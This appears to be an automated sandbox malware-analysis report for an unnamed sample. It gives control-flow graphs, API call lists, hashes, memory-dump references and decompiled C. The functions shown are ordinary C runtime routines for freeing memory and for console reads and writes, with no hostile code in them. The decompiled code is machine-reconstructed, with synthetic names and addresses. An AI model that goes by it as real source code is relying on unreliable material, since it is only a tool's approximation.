                                                                                        control_flow_graph 337 6ce1d6-6ce1ea 338 6ce1ec-6ce1f1 337->338 339 6ce258-6ce260 337->339 338->339 340 6ce1f3-6ce1f8 338->340 341 6ce2a7-6ce2bf call 6ce349 339->341 342 6ce262-6ce265 339->342 340->339 343 6ce1fa-6ce1fd 340->343 351 6ce2c2-6ce2c9 341->351 342->341 345 6ce267-6ce2a4 call 6c6c17 * 4 342->345 343->339 346 6ce1ff-6ce207 343->346 345->341 349 6ce209-6ce20c 346->349 350 6ce221-6ce229 346->350 349->350 356 6ce20e-6ce220 call 6c6c17 call 6cd4e1 349->356 353 6ce22b-6ce22e 350->353 354 6ce243-6ce257 call 6c6c17 * 2 350->354 357 6ce2e8-6ce2ec 351->357 358 6ce2cb-6ce2cf 351->358 353->354 359 6ce230-6ce242 call 6c6c17 call 6cd99b 353->359 354->339 356->350 361 6ce2ee-6ce2f3 357->361 362 6ce304-6ce310 357->362 365 6ce2e5 358->365 366 6ce2d1-6ce2d4 358->366 359->354 369 6ce2f5-6ce2f8 361->369 370 6ce301 361->370 362->351 372 6ce312-6ce31f call 6c6c17 362->372 365->357 366->365 374 6ce2d6-6ce2e4 call 6c6c17 * 2 366->374 369->370 377 6ce2fa-6ce300 call 6c6c17 369->377 370->362 374->365 377->370
                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 006CE21A
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD4FE
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD510
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD522
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD534
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD546
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD558
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD56A
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD57C
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD58E
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD5A0
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD5B2
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD5C4
                                                                                          • Part of subcall function 006CD4E1: _free.LIBCMT ref: 006CD5D6
                                                                                        • _free.LIBCMT ref: 006CE20F
                                                                                          • Part of subcall function 006C6C17: RtlFreeHeap.NTDLL(00000000,00000000,?,006C6996,00000000,00000000,018059B4,00000000,?,006B3319,009066E0,00000010), ref: 006C6C2D
                                                                                          • Part of subcall function 006C6C17: GetLastError.KERNEL32(00000000,?,006C6996,00000000,00000000,018059B4,00000000,?,006B3319,009066E0,00000010), ref: 006C6C3F
                                                                                        • _free.LIBCMT ref: 006CE231
                                                                                        • _free.LIBCMT ref: 006CE246
                                                                                        • _free.LIBCMT ref: 006CE251
                                                                                        • _free.LIBCMT ref: 006CE273
                                                                                        • _free.LIBCMT ref: 006CE286
                                                                                        • _free.LIBCMT ref: 006CE294
                                                                                        • _free.LIBCMT ref: 006CE29F
                                                                                        • _free.LIBCMT ref: 006CE2D7
                                                                                        • _free.LIBCMT ref: 006CE2DE
                                                                                        • _free.LIBCMT ref: 006CE2FB
                                                                                        • _free.LIBCMT ref: 006CE313
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID:
                                                                                        • API String ID: 161543041-0
                                                                                        • Opcode ID: 5a75feaca5b80f03ce359447eff62830b208359f5b2cd1d64a592710ad8d43d0
                                                                                        • Instruction ID: 8439815e8f7fe54b1aa455fddeae84e1d2fea66a31c12cc915f1e94ee41a07c5
                                                                                        • Opcode Fuzzy Hash: 5a75feaca5b80f03ce359447eff62830b208359f5b2cd1d64a592710ad8d43d0
                                                                                        • Instruction Fuzzy Hash: 053159726007419FEB64AA79D945FBA73EAEF01310F14442EF098D7251DB3AEE908728
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 394 6c57bf-6c57cf 395 6c57e9-6c57eb 394->395 396 6c57d1-6c57e4 call 6a9227 call 6a923a 394->396 398 6c57f1-6c57f7 395->398 399 6c5b53-6c5b60 call 6a9227 call 6a923a 395->399 410 6c5b6b 396->410 398->399 402 6c57fd-6c5828 398->402 416 6c5b66 call 6a7c69 399->416 402->399 405 6c582e-6c5837 402->405 408 6c5839-6c584c call 6a9227 call 6a923a 405->408 409 6c5851-6c5853 405->409 408->416 413 6c5b4f-6c5b51 409->413 414 6c5859-6c585d 409->414 415 6c5b6e-6c5b73 410->415 413->415 414->413 418 6c5863-6c5867 414->418 416->410 418->408 419 6c5869-6c5880 418->419 422 6c589d-6c58a6 419->422 423 6c5882-6c5885 419->423 427 6c58a8-6c58bf call 6a9227 call 6a923a call 6a7c69 422->427 428 6c58c4-6c58ce 422->428 425 6c588f-6c5898 423->425 426 6c5887-6c588d 423->426 429 6c5939-6c5953 425->429 426->425 426->427 459 6c5a86 427->459 431 6c58d5-6c58f3 call 6c8110 call 6c6c17 * 2 428->431 432 6c58d0-6c58d2 428->432 434 6c5959-6c5969 429->434 435 6c5a27-6c5a30 call 6d15b0 429->435 463 6c58f5-6c590b call 6a923a call 6a9227 431->463 464 6c5910-6c5936 call 6c50a6 431->464 432->431 434->435 440 6c596f-6c5971 434->440 448 6c5a32-6c5a44 435->448 449 6c5aa3 435->449 440->435 441 6c5977-6c599d 440->441 441->435 445 6c59a3-6c59b6 441->445 445->435 450 6c59b8-6c59ba 445->450 448->449 454 6c5a46-6c5a55 GetConsoleMode 448->454 452 6c5aa7-6c5abf ReadFile 449->452 450->435 455 6c59bc-6c59e7 450->455 457 6c5b1b-6c5b26 GetLastError 452->457 458 6c5ac1-6c5ac7 452->458 454->449 460 6c5a57-6c5a5b 454->460 455->435 462 6c59e9-6c59fc 455->462 465 6c5b3f-6c5b42 457->465 466 6c5b28-6c5b3a call 6a923a call 6a9227 457->466 458->457 467 6c5ac9 458->467 461 6c5a89-6c5a93 call 6c6c17 459->461 460->452 468 6c5a5d-6c5a77 ReadConsoleW 460->468 461->415 462->435 470 6c59fe-6c5a00 462->470 463->459 464->429 477 6c5a7f-6c5a85 call 6a9204 465->477 478 6c5b48-6c5b4a 465->478 466->459 474 6c5acc-6c5ade 467->474 475 6c5a98-6c5aa1 468->475 476 6c5a79 GetLastError 468->476 470->435 481 6c5a02-6c5a22 470->481 474->461 485 6c5ae0-6c5ae4 474->485 475->474 476->477 477->459 478->461 481->435 489 6c5afd-6c5b08 485->489 490 6c5ae6-6c5af6 call 6c54db 485->490 491 6c5b0a call 6c562b 489->491 492 6c5b14-6c5b19 call 6c531b 489->492 499 6c5af9-6c5afb 490->499 500 6c5b0f-6c5b12 491->500 492->500 499->461 500->499
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3907804496
                                                                                        • Opcode ID: b34ed29482acddec7c2ccd72f906252c7c1fc11296ca2269008ac4f69bbff363
                                                                                        • Instruction ID: 44aa6e8b3c1688e989f2952a6cfff2a46c754e8df912a424d783addec78a9721
                                                                                        • Opcode Fuzzy Hash: b34ed29482acddec7c2ccd72f906252c7c1fc11296ca2269008ac4f69bbff363
                                                                                        • Instruction Fuzzy Hash: BEC1AE70904649AFCB519FA9CC85FBDBBB6EF0A310F14418DE416A7392C634AE81CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E10009300(char _a4) {
                                                                                        				char _v8;
                                                                                        
                                                                                        				_t26 = _a4;
                                                                                        				_t52 =  *_a4;
                                                                                        				if( *_a4 != 0x10013bd8) {
                                                                                        					E10009811(_t52);
                                                                                        					_t26 = _a4;
                                                                                        				}
                                                                                        				E10009811( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x30)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x34)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x38)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x28)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x40)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x44)));
                                                                                        				E10009811( *((intOrPtr*)(_a4 + 0x360)));
                                                                                        				_v8 =  &_a4;
                                                                                        				E100091C6(5,  &_v8);
                                                                                        				_v8 =  &_a4;
                                                                                        				return E10009216(4,  &_v8);
                                                                                        			}




                                                                                        0x10009306
                                                                                        0x10009309
                                                                                        0x10009311
                                                                                        0x10009314
                                                                                        0x10009319
                                                                                        0x1000931c
                                                                                        0x10009320
                                                                                        0x1000932b
                                                                                        0x10009336
                                                                                        0x10009341
                                                                                        0x1000934c
                                                                                        0x10009357
                                                                                        0x10009362
                                                                                        0x1000936d
                                                                                        0x1000937b
                                                                                        0x10009383
                                                                                        0x1000938c
                                                                                        0x10009394
                                                                                        0x100093a8

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 10009314
                                                                                          • Part of subcall function 10009811: HeapFree.KERNEL32(00000000,00000000,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?), ref: 10009827
                                                                                          • Part of subcall function 10009811: GetLastError.KERNEL32(?,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?,?), ref: 10009839
                                                                                        • _free.LIBCMT ref: 10009320
                                                                                        • _free.LIBCMT ref: 1000932B
                                                                                        • _free.LIBCMT ref: 10009336
                                                                                        • _free.LIBCMT ref: 10009341
                                                                                        • _free.LIBCMT ref: 1000934C
                                                                                        • _free.LIBCMT ref: 10009357
                                                                                        • _free.LIBCMT ref: 10009362
                                                                                        • _free.LIBCMT ref: 1000936D
                                                                                        • _free.LIBCMT ref: 1000937B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 095609f8ebdff8186aacbce8f9dd07ad3316ae86aad562d8b717c7011e1f557a
                                                                                        • Instruction ID: e842ccda85204b4dc54bff3c1beed5f9a9a98a328ab07a1e7282ea22e47928f9
                                                                                        • Opcode Fuzzy Hash: 095609f8ebdff8186aacbce8f9dd07ad3316ae86aad562d8b717c7011e1f557a
                                                                                        • Instruction Fuzzy Hash: 6211867A904108BFEB01DF95CC46CDD3BA9FF05390B51C1A5FA088F226EA31EE519B80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 502 6a3b50-6a3b95 call 6a3b10 call 6a73dc 507 6a3bf6-6a3bf9 502->507 508 6a3b97-6a3ba9 502->508 509 6a3bfb-6a3c08 call 6a75a0 507->509 510 6a3c19-6a3c22 507->510 508->510 511 6a3bab 508->511 514 6a3c0d-6a3c16 call 6a3b10 509->514 513 6a3bb0-6a3bc7 511->513 515 6a3bc9-6a3bd7 call 6a7550 513->515 516 6a3bdd 513->516 514->510 523 6a3bd9 515->523 524 6a3bed-6a3bf4 515->524 517 6a3be0-6a3be5 516->517 517->513 521 6a3be7-6a3be9 517->521 521->510 525 6a3beb 521->525 526 6a3bdb 523->526 527 6a3c23-6a3c2c 523->527 524->514 525->514 526->517 528 6a3c2e-6a3c35 527->528 529 6a3c66-6a3c76 call 6a7584 527->529 528->529 530 6a3c37-6a3c46 call 6e9520 528->530 535 6a3c8a-6a3cb7 call 6a3b10 call 6a7568 529->535 536 6a3c78-6a3c87 call 6a75a0 529->536 538 6a3c48-6a3c60 530->538 539 6a3c63 530->539 546 6a3d18-6a3d2e 535->546 547 6a3cb9-6a3ce1 535->547 536->535 538->539 539->529 550 6a3d30-6a3d37 546->550 551 6a3d45-6a3d4e 546->551 549 6a3ce3-6a3cfd 547->549 552 6a3cff-6a3d05 549->552 553 6a3d07-6a3d17 549->553 554 6a3d39-6a3d3b 550->554 555 6a3d92-6a3d96 550->555 556 6a3d50-6a3d74 551->556 552->549 557 6a3d8e-6a3d91 554->557 558 6a3d3d-6a3d43 554->558 559 6a3d76-6a3d7b 556->559 560 6a3d97-6a3d9c 556->560 558->550 558->551 559->556 561 6a3d7d-6a3d82 559->561 562 6a3d9e-6a3da0 560->562 563 6a3dd4-6a3dda 560->563 564 6a3d8c-6a3d8d 561->564 565 6a3d84-6a3d8a 561->565 562->564 566 6a3da2-6a3da4 562->566 564->557 565->556 565->564 567 6a3dcd-6a3dd3 566->567 568 6a3da6-6a3da8 566->568 568->564 569 6a3daa-6a3daf 568->569 570 6a3db1-6a3db3 569->570 571 6a3dc6-6a3dcc 569->571 570->564 572 6a3db5-6a3db7 570->572 573 6a3db9-6a3dbb 572->573 574 6a3dbf-6a3dc5 572->574 573->564 575 6a3dbd 573->575 575->556
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 006A3B7B
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 006A3B83
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 006A3C11
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 006A3C3C
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 006A3C91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: P1@$csm
                                                                                        • API String ID: 1170836740-4241934115
                                                                                        • Opcode ID: 5eea9cd5078bc9028af833bf284d909307efea4107fcc3fba08297477b9fb137
                                                                                        • Instruction ID: 827f8759dbe3e86978238ebab5e0c97b589929143063cc5fcc0f9233cd2dae73
                                                                                        • Opcode Fuzzy Hash: 5eea9cd5078bc9028af833bf284d909307efea4107fcc3fba08297477b9fb137
                                                                                        • Instruction Fuzzy Hash: FF711836A102258BCB10FF6CCC506EABBA3AF87324F188269F9159B391D735DE458F50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 73%
                                                                                        			E1000F75D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                        				signed int _v8;
                                                                                        				signed char _v15;
                                                                                        				char _v16;
                                                                                        				void _v24;
                                                                                        				short _v28;
                                                                                        				char _v31;
                                                                                        				void _v32;
                                                                                        				long _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				void* _v44;
                                                                                        				signed int _v48;
                                                                                        				signed char* _v52;
                                                                                        				long _v56;
                                                                                        				int _v60;
                                                                                        				signed int _t78;
                                                                                        				signed int _t80;
                                                                                        				int _t86;
                                                                                        				void* _t94;
                                                                                        				long _t97;
                                                                                        				void _t105;
                                                                                        				void* _t112;
                                                                                        				signed int _t116;
                                                                                        				signed int _t118;
                                                                                        				signed char _t123;
                                                                                        				signed char _t128;
                                                                                        				intOrPtr _t129;
                                                                                        				signed int _t131;
                                                                                        				signed char* _t133;
                                                                                        				intOrPtr* _t135;
                                                                                        				signed int _t136;
                                                                                        				void* _t137;
                                                                                        
                                                                                        				_t78 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t78 ^ _t136;
                                                                                        				_t80 = _a8;
                                                                                        				_t118 = _t80 >> 6;
                                                                                        				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                        				_t133 = _a12;
                                                                                        				_v52 = _t133;
                                                                                        				_v48 = _t118;
                                                                                        				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1001adc0 + _t118 * 4)) + _t116 + 0x18));
                                                                                        				_v40 = _a16 + _t133;
                                                                                        				_t86 = GetConsoleCP();
                                                                                        				_t135 = _a4;
                                                                                        				_v60 = _t86;
                                                                                        				 *_t135 = 0;
                                                                                        				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                        				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                        				while(_t133 < _v40) {
                                                                                        					_v28 = 0;
                                                                                        					_v31 =  *_t133;
                                                                                        					_t129 =  *((intOrPtr*)(0x1001adc0 + _v48 * 4));
                                                                                        					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                        					if((_t123 & 0x00000004) == 0) {
                                                                                        						if(( *(E1000C29A(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                        							_push(1);
                                                                                        							_push(_t133);
                                                                                        							goto L8;
                                                                                        						} else {
                                                                                        							if(_t133 >= _v40) {
                                                                                        								_t131 = _v48;
                                                                                        								 *((char*)( *((intOrPtr*)(0x1001adc0 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                        								 *( *((intOrPtr*)(0x1001adc0 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1001adc0 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                        								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                        							} else {
                                                                                        								_t112 = E100099DA( &_v28, _t133, 2);
                                                                                        								_t137 = _t137 + 0xc;
                                                                                        								if(_t112 != 0xffffffff) {
                                                                                        									_t133 =  &(_t133[1]);
                                                                                        									goto L9;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t128 = _t123 & 0x000000fb;
                                                                                        						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                        						_push(2);
                                                                                        						_v15 = _t128;
                                                                                        						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                        						_push( &_v16);
                                                                                        						L8:
                                                                                        						_push( &_v28);
                                                                                        						_t94 = E100099DA();
                                                                                        						_t137 = _t137 + 0xc;
                                                                                        						if(_t94 != 0xffffffff) {
                                                                                        							L9:
                                                                                        							_t133 =  &(_t133[1]);
                                                                                        							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                        							_v56 = _t97;
                                                                                        							if(_t97 != 0) {
                                                                                        								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                        									L19:
                                                                                        									 *_t135 = GetLastError();
                                                                                        								} else {
                                                                                        									_t48 = _t135 + 8; // 0xff76e900
                                                                                        									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
                                                                                        									if(_v36 >= _v56) {
                                                                                        										if(_v31 != 0xa) {
                                                                                        											goto L16;
                                                                                        										} else {
                                                                                        											_t105 = 0xd;
                                                                                        											_v32 = _t105;
                                                                                        											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                        												goto L19;
                                                                                        											} else {
                                                                                        												if(_v36 >= 1) {
                                                                                        													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                        													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                        													goto L16;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					goto L20;
                                                                                        					L16:
                                                                                        				}
                                                                                        				L20:
                                                                                        				return E1000296F(_v8 ^ _t136);
                                                                                        			}


































                                                                                        0x1000f765
                                                                                        0x1000f76c
                                                                                        0x1000f76f
                                                                                        0x1000f777
                                                                                        0x1000f77b
                                                                                        0x1000f787
                                                                                        0x1000f78a
                                                                                        0x1000f78d
                                                                                        0x1000f794
                                                                                        0x1000f79c
                                                                                        0x1000f79f
                                                                                        0x1000f7a5
                                                                                        0x1000f7ab
                                                                                        0x1000f7b0
                                                                                        0x1000f7b2
                                                                                        0x1000f7b5
                                                                                        0x1000f7ba
                                                                                        0x1000f7c4
                                                                                        0x1000f7cb
                                                                                        0x1000f7ce
                                                                                        0x1000f7d5
                                                                                        0x1000f7dc
                                                                                        0x1000f808
                                                                                        0x1000f82e
                                                                                        0x1000f830
                                                                                        0x00000000
                                                                                        0x1000f80a
                                                                                        0x1000f80d
                                                                                        0x1000f8d4
                                                                                        0x1000f8e0
                                                                                        0x1000f8eb
                                                                                        0x1000f8f0
                                                                                        0x1000f813
                                                                                        0x1000f81a
                                                                                        0x1000f81f
                                                                                        0x1000f825
                                                                                        0x1000f82b
                                                                                        0x00000000
                                                                                        0x1000f82b
                                                                                        0x1000f825
                                                                                        0x1000f80d
                                                                                        0x1000f7de
                                                                                        0x1000f7e2
                                                                                        0x1000f7e5
                                                                                        0x1000f7eb
                                                                                        0x1000f7ed
                                                                                        0x1000f7f0
                                                                                        0x1000f7f4
                                                                                        0x1000f831
                                                                                        0x1000f834
                                                                                        0x1000f835
                                                                                        0x1000f83a
                                                                                        0x1000f840
                                                                                        0x1000f846
                                                                                        0x1000f855
                                                                                        0x1000f85b
                                                                                        0x1000f861
                                                                                        0x1000f866
                                                                                        0x1000f882
                                                                                        0x1000f8f5
                                                                                        0x1000f8fb
                                                                                        0x1000f884
                                                                                        0x1000f884
                                                                                        0x1000f88c
                                                                                        0x1000f895
                                                                                        0x1000f89b
                                                                                        0x00000000
                                                                                        0x1000f89d
                                                                                        0x1000f89f
                                                                                        0x1000f8a2
                                                                                        0x1000f8bb
                                                                                        0x00000000
                                                                                        0x1000f8bd
                                                                                        0x1000f8c1
                                                                                        0x1000f8c3
                                                                                        0x1000f8c6
                                                                                        0x00000000
                                                                                        0x1000f8c6
                                                                                        0x1000f8c1
                                                                                        0x1000f8bb
                                                                                        0x1000f89b
                                                                                        0x1000f895
                                                                                        0x1000f882
                                                                                        0x1000f866
                                                                                        0x1000f840
                                                                                        0x00000000
                                                                                        0x1000f8c9
                                                                                        0x1000f8c9
                                                                                        0x1000f8fd
                                                                                        0x1000f90f

                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,1000FED2,00000000,00000000,00000000,00000000,00000000,100070B6), ref: 1000F79F
                                                                                        • __fassign.LIBCMT ref: 1000F81A
                                                                                        • __fassign.LIBCMT ref: 1000F835
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 1000F85B
                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,1000FED2,00000000,?,?,?,?,?,?,?,?,?,1000FED2,00000000), ref: 1000F87A
                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,1000FED2,00000000,?,?,?,?,?,?,?,?,?,1000FED2,00000000), ref: 1000F8B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0
                                                                                        • Opcode ID: ebf43c5e08b35c4380c27f081e37b5313fc34c662fb0a9f5c1ad01d91821158d
                                                                                        • Instruction ID: 83c1dd24f3ad2e223b62661e21dbbedb72d92a08414af1d65f5432039548fb24
                                                                                        • Opcode Fuzzy Hash: ebf43c5e08b35c4380c27f081e37b5313fc34c662fb0a9f5c1ad01d91821158d
                                                                                        • Instruction Fuzzy Hash: F151B475E002499FEB10CFA8C885AEEBBF8EF09350F15812EE956E7655D730A941CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,006C62E9,00000003,?,00000000,?,00000003,0000000C), ref: 006C5BB6
                                                                                        • __fassign.LIBCMT ref: 006C5C31
                                                                                        • __fassign.LIBCMT ref: 006C5C4C
